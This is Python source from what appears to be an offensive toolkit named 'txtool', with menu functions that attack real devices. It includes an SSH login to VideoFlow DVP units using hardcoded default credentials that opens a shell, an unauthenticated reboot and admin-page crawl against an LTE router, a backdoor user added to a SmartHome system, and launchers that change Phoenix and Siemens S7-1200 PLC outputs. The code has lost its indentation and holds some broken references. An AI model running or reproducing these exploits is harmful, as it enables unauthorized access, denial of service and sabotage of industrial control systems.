def exploit4():
try:
import paramiko
except ImportError:
print(warna.merah + "\n[x] " + warna.tutup + "Error, please install paramiko module. ($ pip2 install paramiko)\n")
sys.exit()
from paramiko.ssh_exception import BadHostKeyException, AuthenticationException, SSHException
IP()
print(warna.kuning + "\n[!]" + warna.tutup + " VideoFlow Digital Video Protection DVP 10 Authenticated Remote Code Execution")
print(warna.kuning + "[!]" + warna.tutup + " Affected version : 2.10 (X-Prototype-Version: 1.6.0.2)")
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
_host = raw_input(warna.biru + "\n[+]" + warna.tutup + " Target ip address" + warna.kuning + " >> " + warna.tutup)
paramiko.util.log_to_file("%s/%s.log" % (txtool_dir, _host))
_user = ["""root""",
"""mom"""]
_connection = None
p = ["""videoflow""",
"""$1$CGgdGXXG$0FmyyKMzcHgkKnUTZi5r./"""]
_passwords = [line.strip() for line in p]
_username = [line.strip() for line in _user]
_retries = range(len(_passwords and _username))
true_ip = ipv4(_host)
if _host == '':
empty()
BACK.menu['menu_utama']()
if not true_ip:
print(warna.merah + "\n[x] " + warna.tutup + "incorrect IP address")
BACK.menu['menu_utama']()
print(warna.hijau + "\n[*] " + warna.tutup + "Trying to login...")
for _pass in _passwords:
for _u in _username:
try:
for x in _retries:
ssh.connect(_host, username=_u, password=_pass, timeout=5)
_connection = True
if _connection:
print(warna.hijau + "[*] " + warna.tutup + "Login Success! user: "******" and password: "******"[*] " + warna.tutup + "shell has been successfully opened\n")
ssh_shell(command)
command.close()
ssh.close()
finish_exploit()
BACK.menu['menu_utama']()
except (BadHostKeyException, AuthenticationException,
SSHException, socket.error) as err:
print warna.merah + "[x] " + warna.tutup + "An error occured:" ,err
time.sleep(1)
print(warna.merah + "\n[x] " + warna.tutup + "Failed to login, maybe target not vuln")
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()
def menu9():
IP()
print(
warna.kuning + "\n[!]" + warna.tutup +
" Print out CPU status and reverts it, tested and working on ILC150 (at least partially working on others"
)
ip = raw_input(warna.biru + "\n[+]" + warna.tutup + " ip address" +
warna.kuning + " >> " + warna.tutup)
true_ip = ipv4(ip)
if ip == '':
empty()
back.menu['menu_utama']()
elif not true_ip:
print(
warna.merah + "\n[x] " + warna.tutup +
"Incorrect ip address, txtool will be assume exploitation is canceled"
)
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup +
"> to continue ")
back.menu['menu_utama']()
else:
subprocess.Popen("%s/PhoenixControlPLC-ILC150.py %s " % (path, ip),
shell=True).wait()
sys.exit()
def exploit2():
'''
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
source: https://www.exploit-db.com/exploits/43402/
Writen in python by Kuburan
'''
IP()
print("\n\t[" + warna.hijau + "1" + warna.tutup + "]" + warna.abuabu + " Denial Of Service" + warna.tutup)
print("\t[" + warna.hijau + "2" + warna.tutup + "]" + warna.abuabu + " Information Disclosure" + warna.tutup)
print("\t[" + warna.hijau + "0" + warna.tutup + "]" + warna.abuabu + " Back" + warna.tutup)
choise = raw_input(warna.biru + "\n[+]" + warna.tutup + " Select An action" + warna.kuning + " >> " + warna.tutup)
if choise == '':
empty()
BACK.menu['menu_utama']()
if choise == '1':
print(warna.kuning + "\n[!]" + warna.tutup + " The router suffers from an unauthenticated reboot command execution. Attackers can exploit this issue to cause a denial of service scenario.")
print(warna.kuning + "[!]" + warna.tutup + " Affected version:\n\tFwVer: SDT-CS3B1, sw version 1.2.0\n\tLteVer: ML300S5XEA41_090 1 0.1.0\n\tModem model: PM-L300S")
target = raw_input(warna.biru + "\n[+]" + warna.tutup + " ip address of Router device" + warna.kuning + " >> " + warna.tutup)
true_ip = ipv4(target)
if target == '':
empty()
BACK.menu['menu_utama']()
if not true_ip:
print(warna.merah + "\n[x] " + warna.tutup + "Warning. wrong ip address, txtool will be assume exploitation is canceled")
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()
port = raw_input(warna.biru + "\n[+]" + warna.tutup + " port of Router device" + warna.kuning + " >> " + warna.tutup)
if port == '':
empty()
BACK.menu['menu_utama']()
else:
try:
print warna.hijau + "\n[*] " + warna.tutup + "Sending reboot command..."
site = ("http://%s:%s/cgi-bin/lte.cgi?Command=Reboot" % (target, port))
req = requests.get(site)
body = req.content
print warna.hijau + "\n[*] " + warna.tutup + body
if "<xml>\n</xml>" in body:
print warna.hijau + "[*] " + warna.tutup + "Router should be rebooted."
finish_exploit()
BACK.menu['menu_utama']()
else:
print warna.kuning + "[!] " + warna.tutup + "maybe attack unsuccessfull."
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()
except requests.exceptions.RequestException as err:
print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,err
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()
except KeyError:
pass
elif choise == '2':
print(warna.kuning + "\n[!]" + warna.tutup + " Insecure direct object references occured when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources and functionalities in the system.")
print(warna.kuning + "[!]" + warna.tutup + " Affected version:\n\tFwVer: SDT-CS3B1, sw version 1.2.0\n\tLteVer: ML300S5XEA41_090 1 0.1.0\n\tModem model: PM-L300S")
target = raw_input(warna.biru + "\n[+]" + warna.tutup + " ip address of Router device" + warna.kuning + " >> " + warna.tutup)
true_ip = ipv4(target)
if target == '':
empty()
BACK.menu['menu_utama']()
if not true_ip:
print(warna.merah + "\n[x] " + warna.tutup + "Warning. wrong ip address, txtool will be assume exploitation is canceled")
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()
else:
while True:
url1 = ("http://%s/nas/smbsrv.shtml" % (target))
try:
print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get Samba server settings information...")
page1 = requests.get(url1, timeout=10)
ok = page1.status_code
page1.raise_for_status()
print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page1.status_code
if ok:
os.system("mkdir -p /data/data/com.termux/files/home/.txtool/%s" % target)
os.system("""echo "http://%s/nas/smbsrv.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
except requests.exceptions.RequestException as a:
print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,a
pass
url2 = ("http://%s/nas/ftpsrv.shtml" % (target))
try:
print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get FTP settings information...")
page2 = requests.get(url2, timeout=10)
ok = page2.status_code
page2.raise_for_status()
print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page2.status_code
if ok:
os.system("""echo "http://%s/nas/ftpsrv.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
except requests.exceptions.RequestException as b:
print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,b
pass
url3 = ("http://%s/wifi2g/basic.shtml" % (target))
try:
print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get Wireless settings information...")
page3 = requests.get(url3, timeout=10)
ok = page3.status_code
page3.raise_for_status()
print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page3.status_code
if ok:
os.system("""echo "http://%s/wifi2g/basic.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
except requests.exceptions.RequestException as c:
print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,c
pass
url4 = ("http://%s/admin/status.shtml" % (target))
try:
print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get Access point status information...")
page4 = requests.get(url4, timeout=10)
ok = page4.status_code
page4.raise_for_status()
print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page4.status_code
if ok:
os.system("""echo "http://%s/admin/status.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
except requests.exceptions.RequestException as d:
print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,d
pass
url5 = ("http://%s/internet/wan.shtml" % (target))
try:
print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get WAN settings information...")
page5 = requests.get(url5, timeout=10)
ok = page5.status_code
page5.raise_for_status()
print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page5.status_code
if ok:
os.system("""echo "http://%s/internet/wan.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
except requests.exceptions.RequestException as e:
print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,e
pass
url6 = ("http://%s/internet/lan.shtml" % (target))
try:
print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get LAN settings information...")
page6 = requests.get(url6, timeout=10)
ok = page6.status_code
page6.raise_for_status()
print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page6.status_code
if ok:
os.system("""echo "http://%s/internet/lan.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
except requests.exceptions.RequestException as f:
print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,f
pass
url7 = ("http://%s/admin/statistic.shtml" % (target))
try:
print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get System statistics information...")
page7 = requests.get(url7, timeout=10)
ok = page7.status_code
page7.raise_for_status()
print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page7.status_code
if ok:
os.system("""echo "http://%s/admin/statistic.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
except requests.exceptions.RequestException as g:
print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,g
pass
url8 = ("http://%s/admin/management.shtml" % (target))
try:
print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get System management information...")
page8 = requests.get(url8, timeout=10)
ok = page8.status_code
page8.raise_for_status()
print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page8.status_code
if ok:
os.system("""echo "http://%s/admin/management.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
except requests.exceptions.RequestException as h:
print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,h
pass
url9 = ("http://%s/serial/serial_direct.shtml" % (target))
try:
print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get Direct serial settings information...")
page9 = requests.get(url9, timeout=10)
ok = page9.status_code
page9.raise_for_status()
print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page9.status_code
if ok:
os.system("""echo "http://%s/serial/serial_direct.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
except requests.exceptions.RequestException as i:
print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,i
pass
url10 = ("http://%s/admin/system_command.shtml" % (target))
try:
print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get System command interface...")
page10 = requests.get(url10, timeout=10)
ok = page10.status_code
page10.raise_for_status()
print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page10.status_code
if ok:
os.system("""echo "http://%s/admin/system_command.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
except requests.exceptions.RequestException as j:
print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,j
pass
url11 = ("http://%s/internet/dhcpcliinfo.shtml" % (target))
try:
print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get DHCP Clients information...")
page11 = requests.get(url11, timeout=10)
ok = page11.status_code
page11.raise_for_status()
print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page11.status_code
if ok:
os.system("""echo "http://%s/internet/dhcpcliinfo.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
except requests.exceptions.RequestException as k:
print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,k
pass
url12 = ("http://%s/admin/upload_firmware.shtml" % (target))
try:
print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get Router firmware information...")
page12 = requests.get(url12, timeout=10)
ok = page12.status_code
page12.raise_for_status()
print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page12.status_code
if ok:
os.system("""echo "http://%s/admin/upload_firmware.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
except requests.exceptions.RequestException as l:
print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,l
pass
url13 = ("http://%s/firewall/vpn_futuresystem.shtml" % (target))
try:
print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get VPN settings information...")
page13 = requests.get(url13, timeout=10)
ok = page13.status_code
page13.raise_for_status()
print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page13.status_code
if ok:
os.system("""echo "http://%s/firewall/vpn_futuresystem.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
except requests.exceptions.RequestException as m:
print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,m
pass
url14 = ("http://%s/cgi-bin/lte.cgi?Command=getUiccState" % (target))
try:
print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get GetUiccState() information...")
page14 = requests.get(url14, timeout=10)
ok = page14.status_code
page14.raise_for_status()
print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page14.status_code
if ok:
os.system("""echo "http://%s/cgi-bin/lte.cgi?Command=getUiccState" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
except requests.exceptions.RequestException as n:
print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,n
pass
url15 = ("http://%s/cgi-bin/lte.cgi?Command=getModemStatus" % (target))
try:
print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get Modem status information...")
page15 = requests.get(url15, timeout=10)
ok = page15.status_code
page15.raise_for_status()
print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page15.status_code
if ok:
os.system("""echo "http://%s/cgi-bin/lte.cgi?Command=getModemStatus" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
except requests.exceptions.RequestException as o:
print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,o
pass
url16 = ("http://%s/cgi-bin/systemutil.cgi?Command=SystemInfo" % (target))
try:
print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get System information...")
page16 = requests.get(url16, timeout=10)
ok = page16.status_code
page16.raise_for_status()
print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page16.status_code
if ok:
os.system("""echo "http://%s/cgi-bin/systemutil.cgi?Command=SystemInfo" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
break
except requests.exceptions.RequestException as p:
print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,p
print warna.merah + "\n[x] " + warna.tutup + "To many error occured, finish crawling."
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()
print(warna.hijau + "\n[*] " + warna.tutup + "Crawl result has been saved to $HOME/.txtool/%s/target.txt" % (target))
finish_exploit()
BACK.menu['menu_utama']()
elif choise == '0':
BACK.menu['menu_utama']()
else:
print warna.merah + "\n[x] " + warna.tutup + "Wrong command."
BACK.menu['menu_utama']()
def exploit3():
try:
IP()
print(warna.kuning + "\n[!]" + warna.tutup + " the Vulnerability allow unauthenticated attacker to remotely bypass authentication and added new user.")
print(warna.kuning + "[!]" + warna.tutup + " Affected version : 4.20 and older")
target = raw_input(warna.biru + "\n[+]" + warna.tutup + " ip address of SmartHome device" + warna.kuning + " >> " + warna.tutup)
true_ip = ipv4(target)
if target == '':
empty()
BACK.menu['menu_utama']()
if not true_ip:
print(warna.merah + "\n[x] " + warna.tutup + "incorrect IP address")
BACK.menu['menu_utama']()
port = '9000'
print(warna.kuning + "\n[!]" + warna.tutup + " Make your own username")
user = raw_input(warna.biru + "[+]" + warna.tutup + " Username" + warna.kuning + " >> " + warna.tutup)
if user == '':
empty()
BACK.menu['menu_utama']()
print(warna.kuning + "\n[!]" + warna.tutup + " Make your own password")
password = raw_input(warna.biru + "[+]" + warna.tutup + " Password" + warna.kuning + " >> " + warna.tutup)
if password == '':
empty()
BACK.menu['menu_utama']()
url = ("http://%s:%s/content/new_user.php?user_name=%s&password=%s&group_id=1" %
(target, port, user, password))
req = requests.get(url, timeout=10)
req.status_code
req.raise_for_status()
if req.ok:
print(warna.hijau + "\n[*] " + warna.tutup + "Successfully added new users")
print("\n username : %s" % (user))
print(" password : %s" % (password))
print(" login page : http://%s:%s/content/smarthome.php" % (target, port))
finish_exploit()
BACK.menu['menu_utama']()
else:
print(warna.merah + "\n[x] " + warna.tutup + "Failed to add new users, it looks like your target is not a SmartHome System")
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()
except requests.exceptions.HTTPError as error_1:
print warna.merah + "\n[x]" + warna.tutup + " Http Error : ", error_1
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()
except requests.exceptions.ConnectionError as error_2:
print warna.merah + "\n[x]" + warna.tutup + " Error Connecting : ", error_2
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()
except requests.exceptions.Timeout as error_3:
print warna.merah + "\n[x]" + warna.tutup + " Timeout Error : ", error_3
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()
except requests.exceptions.RequestException as err:
print warna.merah + "\n[x]" + warna.tutup, err
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
BACK.menu['menu_utama']()
def menu10():
IP()
print(
warna.kuning + "\n[!]" + warna.tutup +
" reading inputs, setting outputs, and merkers of for Siemens S7-1200 (firmware <= v3)"
)
ip = raw_input(warna.biru + "\n[+]" + warna.tutup + " ip address" +
warna.kuning + " >> " + warna.tutup)
true_ip = ipv4(ip)
if ip == '':
empty()
back.menu['menu_utama']()
elif not true_ip:
print(
warna.merah + "\n[x] " + warna.tutup +
"Incorrect ip address, txtool will be assume exploitation is canceled"
)
raw_input(" press <" + warna.hijau + "Enter" + warna.tutup +
"> to continue ")
back.menu['menu_utama']()
print(warna.kuning + "\n[!]" + warna.tutup + " The default port is 102")
port = raw_input(warna.biru + "[+]" + warna.tutup + " port number" +
warna.kuning + " >> " + warna.tutup)
if port == "":
port = "102"
print(warna.kuning + '\n[!]' + warna.tutup +
' Example : "10101010,3" to set merkers 3.0 through 3.7')
merker = raw_input(warna.biru + "[+]" + warna.tutup + " Set the merkers" +
warna.kuning + " >> " + warna.tutup)
print(warna.kuning + '\n[!] ' + warna.tutup +
'Example set output : "00000000"')
output = raw_input(warna.biru + "[+] " + warna.tutup + "Set outputs" +
warna.kuning + " >> " + warna.tutup)
if output == '' and merker == '' and port == '':
subprocess.Popen("%s/S7-1200-Workshop.py -t %s -p 102 -r " %
(path, ip),
shell=True).wait()
finish_exploit()
back.menu['menu_utama']()
sys.exit()
if port == '' and merker == '':
subprocess.Popen("%s/S7-1200-Workshop.py -t %s -p 102 -o %s " %
(path, ip, output),
shell=True).wait()
finish_exploit()
back.menu['menu_utama']()
sys.exit()
if port == '' and output == '':
subprocess.Popen("%s/S7-1200-Workshop.py -t %s -p 102 -m %s " %
(path, ip, merker),
shell=True).wait()
finish_exploit()
back.menu['menu_utama']()
sys.exit()
elif merker == '' and output == '':
subprocess.Popen("%s/S7-1200-Workshop.py -t %s -p %s -r " %
(path, ip, port),
shell=True).wait()
finish_exploit()
back.menu['menu_utama']()
sys.exit()
elif merker == '':
subprocess.Popen("%s/S7-1200-Workshop.py -t %s -p %s -o %s " %
(path, ip, port, output),
shell=True).wait()
finish_exploit()
back.menu['menu_utama']()
sys.exit()
elif output == '':
subprocess.Popen("%s/S7-1200-Workshop.py -t %s -p %s -m %s " %
(path, ip, port, marker),
shell=True).wait()
finish_exploit()
back.menu['menu_utama']()
sys.exit()
else:
subprocess.Popen("%s/S7-1200-Workshop.py -t %s -p %s -o %s -m %s " %
(path, ip, port, output, merker),
shell=True).wait()
finish_exploit()
back.menu['menu_utama']()
sys.exit()